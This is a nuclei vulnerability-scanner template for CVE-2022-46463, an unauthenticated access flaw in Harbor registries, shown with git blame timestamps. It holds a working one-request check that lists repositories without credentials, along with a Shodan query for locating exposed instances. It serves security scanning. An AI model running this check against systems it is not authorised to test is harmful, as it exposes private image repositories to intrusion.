nuclei-templates/http/cves/2022/CVE-2022-46463.yaml

38 lines
908 B
YAML
Raw Normal View History

2023-08-16 08:46:20 +00:00
id: CVE-2022-46463
info:
name: Harbor <=2.5.3 - Unauthorized Access
author: Arm!tage
severity: high
2023-08-16 09:22:52 +00:00
description: |
An access control issue in Harbor v1.X.X to v2.5.3 allows attackers to access public and private image repositories without authentication
2023-08-16 08:46:20 +00:00
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2022-46463
2023-08-16 09:28:32 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-306
2023-08-16 08:46:20 +00:00
metadata:
max-request: 1
2023-08-16 09:22:52 +00:00
shodan-query: http.favicon.hash:657337228
verified: true
tags: cve,cve2022,harbor,auth-bypass,exposure
2023-08-16 08:46:20 +00:00
http:
- method: GET
path:
2023-08-16 08:57:23 +00:00
- '{{BaseURL}}/api/v2.0/search?q=/'
2023-08-16 08:46:20 +00:00
matchers-condition: and
matchers:
- type: word
2023-08-16 08:57:23 +00:00
part: response
2023-08-16 08:46:20 +00:00
words:
2023-08-16 08:57:23 +00:00
- 'repository_name'
- 'project_name'
condition: and
2023-08-16 08:46:20 +00:00
- type: status
status:
2023-08-16 08:57:23 +00:00
- 200